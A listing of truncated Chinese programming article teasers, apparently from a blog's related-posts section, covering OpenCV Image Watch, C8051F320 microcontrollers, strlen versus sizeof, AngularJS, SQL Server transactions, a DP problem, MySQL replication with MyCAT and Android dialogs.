    Image Watch是在VS2012上使用的一款OpenCV工具,能够实时显示图像和矩阵Mat的内容,跟Matlab很像,方便程序调试,相当好用.跟VS2012配合使用,简直就是一款神器!让我一下就 ...

  4. c8051f320学习,单片机不外乎时钟、IO、串口、USB等外设用法

      时钟 IO(输入.输出,如何配置) IO   数字和模拟资源可以通过25个I/O 引脚(C805 1F3 2 0 ),每个端口引脚都可以被定义为 通用I/O(GPIO)或 0 模拟输入 所有端口I ...

  5. strlen 与 sizeof 的区别

    void ngx_time_init(void) { ngx_cached_err_log_time.len = sizeof("1970/09/28 12:00:00") - 1 ...

  6. [译]用AngularJS构建大型ASP.NET单页应用(三)

    原文地址:http://www.codeproject.com/Articles/808213/Developing-a-Large-Scale-Application-with-a-Single A ...

  7. sql server 事务处理

    事物处理   事务是SQL Server中的单个逻辑单元,一个事务内的所有SQL语句作为一个整体执行,要么全部执行,要么都不执行. 事务有4个属性,称为ACID(原子性.一致性.隔离性和持久性)   ...

  8. [HDU5904]LCIS(DP)

    题意: 给定两个序列,求它们的最长公共递增子序列的长度, 并且这个子序列的值是连续的 n,m<=1e5,a[i],b[i]<=1e6分析:dp[i]表示以数字i结尾的序列最长长度 dp[a ...

  9. LVS+MYCAT+读写分离+MYSQL主备同步部署手册

    LVS+MYCAT+读写分离+MYSQL主备同步部署手册 1          配置MYSQL主备同步…. 2 1.1       测试环境… 2 1.2       配置主数据库… 2 1.2.1  ...

  10. Android下常见的四种对话框

    摘要:在实际开发过程有时为了能够和用户进行很好的交互,需要使用到对话框,在Android中常用的对话框有四种:普通对话框.单选对话框.多选对话框.进度对话框. 一.普度对话框 public void ...